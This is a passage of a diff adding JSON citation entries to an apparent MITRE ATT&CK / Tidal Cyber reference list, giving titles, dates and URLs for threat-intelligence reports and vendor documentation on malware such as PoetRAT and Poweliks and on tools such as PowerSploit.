"https://blog.talosintelligence.com/2020/10/poetrat-update.html" + ], + "source": "MITRE", + "title": "PoetRAT: Malware targeting public and private sector in Azerbaijan evolves" + }, + "related": [], + "uuid": "5862c90a-3bae-48d0-8749-9a6510fe3630", + "value": "Talos PoetRAT October 2020" + }, + { + "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.", + "meta": { + "date_accessed": "2020-04-27T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html" + ], + "source": "MITRE", + "title": "PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors" + }, + "related": [], + "uuid": "fe2a79a5-bc50-4147-b919-f3d0eb7430b6", + "value": "Talos PoetRAT April 2020" + }, + { + "description": "Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-11-02T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More" + ], + "source": "MITRE", + "title": "Poisoning the Well: Banking Trojan Targets Google Search Results" + }, + "related": [], + "uuid": "f96711d4-010d-4d7e-8074-31dd1b41c54d", + "value": "Talos Zeus Panda Nov 2017" + }, + { + "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" + ], + "source": "MITRE", + "title": "POISON IVY: Assessing Damage and Extracting Intelligence" + }, + "related": [], + "uuid": "c189447e-a903-4dc2-a38b-1f4accc64e20", + "value": "FireEye Poison Ivy" + }, + { + "description": "Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.", + "meta": { + "date_accessed": "2018-03-05T00:00:00Z", + "date_published": "2016-09-05T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046" + ], + "source": "MITRE", + "title": "Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems" + }, + "related": [], + "uuid": "38d9c5a2-8fa5-4cb7-a1a9-86b3f54c1eb7", + "value": "Umbreon Trend Micro" + }, + { + "description": "AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html" + ], + "source": "MITRE", + "title": "Policies and permissions in IAM" + }, + "related": [], + "uuid": "9bb520fa-0c4f-48aa-8b0a-8f1d42ee1d0c", + "value": "AWS IAM Policies and Permissions" + }, + { + "description": "Microsoft. (2023, January 26). Policy CSP - WindowsLogon. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2023-01-26T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowslogon" + ], + "source": "MITRE", + "title": "Policy CSP - WindowsLogon" + }, + "related": [], + "uuid": "36a7ed58-95ef-594f-a15b-5c3b5911a630", + "value": "EnableMPRNotifications" + }, + { + "description": "Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/ms677626.aspx" + ], + "source": "MITRE", + "title": "Polling for Changes Using the DirSync Control" + }, + "related": [], + "uuid": "6b7ad651-8c48-462d-90db-07ed3d570118", + "value": "Microsoft DirSync" + }, + { + "description": "Li, V. (2019, October 2). Polyglot Files: a Hacker’s best friend. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2019-10-02T00:00:00Z", + "refs": [ + "https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a" + ], + "source": "MITRE", + "title": "Polyglot Files: a Hacker’s best friend" + }, + "related": [], + "uuid": "ea9c1fc9-41d7-5629-b714-62f9ecf70e3b", + "value": "Polyglot Files: a Hacker’s best friend" + }, + { + "description": "Eisenkraft, K., Olshtein, A. (2019, October 17). Pony’s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2019-10-17T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/" + ], + "source": "MITRE", + "title": "Pony’s C&C servers hidden inside the Bitcoin blockchain" + }, + "related": [], + "uuid": "ce64739e-1311-4e1b-8352-ff941786ff39", + "value": "CheckPoint Redaman October 2019" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.", + "meta": { + "date_accessed": "2016-03-16T00:00:00Z", + "date_published": "2016-02-09T00:00:00Z", + "refs": [ + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage" + }, + "related": [], + "uuid": "e53bc63e-986f-4d48-a6b7-ed8e93494ed5", + "value": "Kaspersky Poseidon Group" + }, + { + "description": "Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.", + "meta": { + "date_accessed": "2020-02-17T00:00:00Z", + "date_published": "2019-05-08T00:00:00Z", + "refs": [ + "https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident" + ], + "source": "MITRE", + "title": "Post-mortem and remediations for Apr 11 security incident" + }, + "related": [], + "uuid": "f1d15b92-8840-45ae-b23d-0cba20fc22cc", + "value": "Breach Post-mortem SSH Hijack" + }, + { + "description": "Elastic. (n.d.). Potential Protocol Tunneling via EarthWorm. Retrieved July 7, 2023.", + "meta": { + "date_accessed": "2023-07-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-protocol-tunneling-via-earthworm.html" + ], + "source": "Tidal Cyber", + "title": "Potential Protocol Tunneling via EarthWorm" + }, + "related": [], + "uuid": "a02790a1-f7c5-43b6-bc7e-075b2c0aa791", + "value": "Elastic Docs Potential Protocol Tunneling via EarthWorm" + }, + { + "description": "B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.", + "meta": { + "date_accessed": "2018-03-05T00:00:00Z", + "date_published": "2014-08-20T00:00:00Z", + "refs": [ + "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" + ], + "source": "MITRE", + "title": "Poweliks – Command Line Confusion" + }, + "related": [], + "uuid": "49a21bba-b77d-4b0e-b666-20ef2826e92c", + "value": "This is Security Command Line Confusion" + }, + { + "description": "Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.", + "meta": { + "date_accessed": "2018-08-09T00:00:00Z", + "date_published": "2014-08-01T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/" + ], + "source": "MITRE", + "title": "POWELIKS: Malware Hides In Windows Registry" + }, + "related": [], + "uuid": "4a42df15-4d09-4f4f-8333-2b41356fdb80", + "value": "TrendMicro POWELIKS AUG 2014" + }, + { + "description": "Microsoft. (2021, December 15). Powercfg command-line options. Retrieved June 5, 2023.", + "meta": { + "date_accessed": "2023-06-05T00:00:00Z", + "date_published": "2021-12-15T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict" + ], + "source": "MITRE", + "title": "Powercfg command-line options" + }, + "related": [], + "uuid": "d9b5be77-5e44-5786-a683-82642b8dd8c9", + "value": "Microsoft: Powercfg command-line options" + }, + { + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "meta": { + "date_accessed": "2017-01-11T00:00:00Z", + "date_published": "2016-11-09T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + ], + "source": "MITRE", + "title": "PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs" + }, + "related": [], + "uuid": "4026c055-6020-41bb-a4c8-54b308867023", + "value": "Volexity PowerDuke November 2016" + }, + { + "description": "Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage" + ], + "source": "MITRE", + "title": "PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage" + }, + "related": [], + "uuid": "095aaa25-b674-4313-bc4f-3227b00c0459", + "value": "Cybereason PowerLess February 2022" + }, + { + "description": "MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "date_published": "2013-08-13T00:00:00Z", + "refs": [ + "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + ], + "source": "MITRE", + "title": "PowerLoader Injection – Something truly amazing" + }, + "related": [], + "uuid": "9a9a6ca1-d7c5-4385-924b-cdeffd66602e", + "value": "MalwareTech Power Loader Aug 2013" + }, + { + "description": "LOLBAS. (2019, July 19). Powerpnt.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-07-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/" + ], + "source": "Tidal Cyber", + "title": "Powerpnt.exe" + }, + "related": [], + "uuid": "23c48ab3-9426-4949-9a35-d1b9ecb4bb47", + "value": "Powerpnt.exe - LOLBAS Project" + }, + { + "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.", + "meta": { + "date_accessed": "2020-09-04T00:00:00Z", + "date_published": "2020-08-26T00:00:00Z", + "refs": [ + "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics" + ], + "source": "MITRE", + "title": "PowerShell Command History Forensics" + }, + "related": [], + "uuid": "9cff28da-c379-49e7-b971-7dccc72054fc", + "value": "Sophos PowerShell Command History Forensics" + }, + { + "description": "PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.", + "meta": { + "date_accessed": "2023-03-27T00:00:00Z", + "date_published": "2017-11-02T00:00:00Z", + "refs": [ + "https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/" + ], + "source": "MITRE", + "title": "PowerShell Constrained Language Mode" + }, + "related": [], + "uuid": "d6eaa28f-f900-528a-bba0-560a37c90a98", + "value": "Microsoft PowerShell CLM" + }, + { + "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "date_published": "2016-05-20T00:00:00Z", + "refs": [ + "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/" + ], + "source": "MITRE", + "title": "PowerShell, C-Sharp and DDE The Power Within" + }, + "related": [], + "uuid": "28b3c105-8d64-4767-a735-d353d1fee756", + "value": "SensePost PS DDE May 2016" + }, + { + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "refs": [ + "https://github.com/mattifestation/PowerSploit" + ], + "source": "MITRE", + "title": "Powersploit" + }, + "related": [], + "uuid": "8e870f75-ed76-4898-bfbb-ad3c0c1ae0ca", + "value": "Powersploit" + }, + { + "description": "PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.", + "meta": { + "date_accessed": "2018-02-06T00:00:00Z", + "refs": [ + "http://powersploit.readthedocs.io" + ], + "source": "MITRE", + "title": "PowerSploit" + }, + "related": [], + "uuid": "56628e55-94cd-4c5e-8f5a-34ffb7a45174", + "value": "PowerSploit Documentation" + }, + { + "description": "Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.", + "meta": { + "date_accessed": "2018-02-06T00:00:00Z", + "date_published": "2014-07-08T00:00:00Z", + "refs": [ + "http://www.powershellmagazine.com/2014/07/08/powersploit/" + ], + "source": "MITRE", + "title": "PowerSploit" + }, + "related": [], + "uuid": "7765d4f7-bf2d-43b9-a87e-74114a092645", + "value": "PowerShellMagazine PowerSploit July 2014" + }, + { + "description": "PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.", + "meta": { + "date_accessed": "2018-02-06T00:00:00Z", + "date_published": "2012-05-26T00:00:00Z", + "refs": [ + "https://github.com/PowerShellMafia/PowerSploit" + ], + "source": "MITRE", + "title": "PowerSploit - A PowerShell Post-Exploitation Framework" + }, + "related": [], + "uuid": "ec3edb54-9f1b-401d-a265-cd8924e5cb2b", + "value": "GitHub PowerSploit May 2012" + }, + { + "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.", + "meta": { + "date_accessed": "2019-02-07T00:00:00Z", + "date_published": "2017-06-02T00:00:00Z", + "refs": [ + "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" + ], + "source": "MITRE", + "title": "Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes)" + }, + "related": [], + "uuid": "34deeec2-6edc-492c-bb35-5ccb1dc8e4df", + "value": "byt3bl33d3r NTLM Relaying" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. Retrieved February 9, 2024.", + "meta": { + "date_accessed": "2024-02-09T00:00:00Z", + "date_published": "2024-02-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" + ], + "source": "Tidal Cyber", + "title": "PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure" + }, + "related": [], + "uuid": "c74f5ecf-8810-4670-b778-24171c078724", + "value": "U.S. CISA Volt Typhoon February 7 2024" + }, + { + "description": "Zimbra. (2023, March 16). Preauth. Retrieved May 31, 2023.", + "meta": { + "date_accessed": "2023-05-31T00:00:00Z", + "date_published": "2023-03-16T00:00:00Z", + "refs": [ + "https://wiki.zimbra.com/wiki/Preauth" + ], + "source": "MITRE", + "title": "Preauth" + }, + "related": [], + "uuid": "f8931e8d-9a03-5407-857a-2a1c5a895eed", + "value": "Zimbra Preauth" + }, + { + "description": "Microsoft. (2012, July 18). Preauthentication. Retrieved August 24, 2020.", + "meta": { + "date_accessed": "2020-08-24T00:00:00Z", + "date_published": "2012-07-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Preauthentication" + }, + "related": [], + "uuid": "edaf08ec-0a56-480a-93ef-eb8038147e5c", + "value": "Microsoft Preauthentication Jul 2012" + }, + { + "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.", + "meta": { + "date_accessed": "2019-04-26T00:00:00Z", + "date_published": "2016-11-02T00:00:00Z", + "refs": [ + "https://arxiv.org/pdf/1611.00791.pdf" + ], + "source": "MITRE", + "title": "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks" + }, + "related": [], + "uuid": "4462e71d-0373-4fc0-8cde-93a2972bedd5", + "value": "Elastic Predicting DGA" + }, + { + "description": "Callum Roxan, Sami Ruohonen. (2021, May 10). Prelude to Ransomware: SystemBC. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2021-05-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://labs.withsecure.com/publications/prelude-to-ransomware-systembc" + ], + "source": "Tidal Cyber", + "title": "Prelude to Ransomware: SystemBC" + }, + "related": [], + "uuid": "4004e072-9e69-4e81-a2b7-840e106cf3d9", + "value": "WithSecure SystemBC May 10 2021" + }, + { + "description": "LOLBAS. (2018, May 25). Presentationhost.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/" + ], + "source": "Tidal Cyber", + "title": "Presentationhost.exe" + }, + "related": [], + "uuid": "37539e72-18f5-435a-a949-f9fa5991149a", + "value": "Presentationhost.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.", + "meta": { + "date_accessed": "2020-10-12T00:00:00Z", + "date_published": "2020-09-29T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover" + ], + "source": "MITRE", + "title": "Prevent dangling DNS entries and avoid subdomain takeover" + }, + "related": [], + "uuid": "b8005a55-7e77-4dc1-abed-f75a0a3d8afb", + "value": "Microsoft Sub Takeover 2020" + }, + { + "description": "Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020.", + "meta": { + "date_accessed": "2020-06-01T00:00:00Z", + "date_published": "2020-03-10T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections" + ], + "source": "MITRE", + "title": "Preventing SMB traffic from lateral connections and entering or leaving the network" + }, + "related": [], + "uuid": "cd2fd958-63ce-4ac9-85e6-bb32f29d88b0", + "value": "Microsoft Preventing SMB" + }, + { + "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2016-06-28T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/" + ], + "source": "MITRE", + "title": "Prince of Persia – Game Over" + }, + "related": [], + "uuid": "e08bfc40-a580-4fa3-9531-d5e1bede374e", + "value": "Palo Alto Prince of Persia" + }, + { + "description": "LOLBAS. (2021, June 21). PrintBrm.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-06-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/" + ], + "source": "Tidal Cyber", + "title": "PrintBrm.exe" + }, + "related": [], + "uuid": "a7ab6f09-c22f-4627-afb1-c13a963efca5", + "value": "PrintBrm.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Print.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/" + ], + "source": "Tidal Cyber", + "title": "Print.exe" + }, + "related": [], + "uuid": "696ce89a-b3a1-4993-b30d-33a669a57031", + "value": "Print.exe - LOLBAS Project" + }, + { + "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" + ], + "source": "MITRE", + "title": "Privilege Escalation in Google Cloud Platform – Part 1 (IAM)" + }, + "related": [], + "uuid": "55373476-1cbe-49f5-aecb-69d60b336d38", + "value": "Rhingo Security Labs GCP Privilege Escalation" + }, + { + "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" + ], + "source": "MITRE", + "title": "Privilege Escalation in Google Cloud Platform – Part 1 (IAM)" + }, + "related": [], + "uuid": "55173e12-9edc-5685-ac0b-acd51617cc6e", + "value": "Rhino Google Cloud Privilege Escalation" + }, + { + "description": "Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.", + "meta": { + "date_accessed": "2018-05-17T00:00:00Z", + "date_published": "2017-06-06T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html" + ], + "source": "MITRE", + "title": "Privileges and Credentials: Phished at the Request of Counsel" + }, + "related": [], + "uuid": "d75508b1-8b85-47c9-a087-bc64e8e4cb33", + "value": "FireEye APT19" + }, + { + "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "date_published": "2021-02-10T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" + ], + "source": "MITRE", + "title": "Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies" + }, + "related": [], + "uuid": "710ed789-de1f-4601-a8ba-32147827adcb", + "value": "Anomali Static Kitten February 2021" + }, + { + "description": "LOLBAS. (2020, October 14). Procdump.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-10-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/" + ], + "source": "Tidal Cyber", + "title": "Procdump.exe" + }, + "related": [], + "uuid": "3e37fe71-71d0-424e-96ff-81070e2571ae", + "value": "Procdump.exe - LOLBAS Project" + }, + { + "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags" + ], + "source": "MITRE", + "title": "Process Creation Flags" + }, + "related": [], + "uuid": "d4edd219-c91a-4ff1-8f22-10daa1057f29", + "value": "Microsoft Process Creation Flags May 2018" + }, + { + "description": "hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-18T00:00:00Z", + "refs": [ + "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" + ], + "source": "MITRE", + "title": "Process Doppelgänging – a new way to impersonate a process" + }, + "related": [], + "uuid": "b7a86159-7005-4b61-8b4e-a3dcd77c6a7d", + "value": "hasherezade Process Doppelgänging Dec 2017" + }, + { + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + "source": "MITRE", + "title": "Processes and Threads" + }, + "related": [], + "uuid": "250c689d-9a9c-4f02-8b99-ca43fbdaddae", + "value": "Microsoft Processes and Threads" + }, + { + "description": "ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.", + "meta": { + "date_accessed": "2022-04-11T00:00:00Z", + "date_published": "2009-10-27T00:00:00Z", + "refs": [ + "https://github.com/processhacker/processhacker" + ], + "source": "MITRE", + "title": "Process Hacker" + }, + "related": [], + "uuid": "3fc82a92-cfba-405d-b30e-22eba69ab1ee", + "value": "ProcessHacker Github" + }, + { + "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://www.autosectools.com/process-hollowing.pdf" + ], + "source": "MITRE", + "title": "Process Hollowing" + }, + "related": [], + "uuid": "8feb180a-bfad-42cb-b8ee-792c5088567a", + "value": "Leitch Hollowing" + }, + { + "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2020-02-28T00:00:00Z", + "refs": [ + "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=" + ], + "source": "MITRE", + "title": "Profiling of TA505 Threat Group That Continues to Attack the Financial Sector" + }, + "related": [], + "uuid": "d4e2c109-341c-45b3-9d41-3eb980724524", + "value": "Korean FSI TA505 2020" + }, + { + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview" + ], + "source": "MITRE", + "title": "Profiling Overview" + }, + "related": [], + "uuid": "eb0909ea-616c-4d79-b145-ee2f1ae539fb", + "value": "Microsoft Profiling Mar 2017" + }, + { + "description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/" + ], + "source": "MITRE", + "title": "Programming reference for the Win32 API" + }, + "related": [], + "uuid": "585b9975-3cfb-4485-a9eb-5eea337ebd3c", + "value": "Microsoft Win32" + }, + { + "description": "ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.", + "meta": { + "date_accessed": "2015-12-17T00:00:00Z", + "date_published": "2015-09-23T00:00:00Z", + "refs": [ + "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Project CameraShy: Closing the Aperture on China's Unit 78020" + }, + "related": [], + "uuid": "9942b6a5-6ffb-4a26-9392-6c8bb9954997", + "value": "CameraShy" + }, + { + "description": "Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.", + "meta": { + "date_accessed": "2021-09-02T00:00:00Z", + "date_published": "2016-03-25T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/" + ], + "source": "MITRE", + "title": "ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe" + }, + "related": [], + "uuid": "adee82e6-a74a-4a91-ab5a-97847b135ca3", + "value": "Unit 42 ProjectM March 2016" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-08-08T00:00:00Z", + "refs": [ + "https://securelist.com/faq-the-projectsauron-apt/75533/" + ], + "source": "MITRE, Tidal Cyber", + "title": "ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms" + }, + "related": [], + "uuid": "baeaa632-3fa5-4d2b-9537-ccc7674fd7d6", + "value": "Kaspersky ProjectSauron Blog" + }, + { + "description": "GReAT. (2019, April 10). Project TajMahal – a sophisticated new APT framework. Retrieved October 14, 2019.", + "meta": { + "date_accessed": "2019-10-14T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://securelist.com/project-tajmahal/90240/" + ], + "source": "MITRE", + "title": "Project TajMahal – a sophisticated new APT framework" + }, + "related": [], + "uuid": "1ed20522-52ae-4d0c-b42e-c680490958ac", + "value": "Kaspersky TajMahal April 2019" + }, + { + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "meta": { + "date_accessed": "2017-10-04T00:00:00Z", + "date_published": "2015-10-13T00:00:00Z", + "refs": [ + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + ], + "source": "MITRE", + "title": "Prolific Cybercrime Gang Favors Legit Login Credentials" + }, + "related": [], + "uuid": "afe0549d-dc1b-4bcf-9a1d-55698afd530e", + "value": "DarkReading FireEye FIN5 Oct 2015" + }, + { + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.", + "meta": { + "date_accessed": 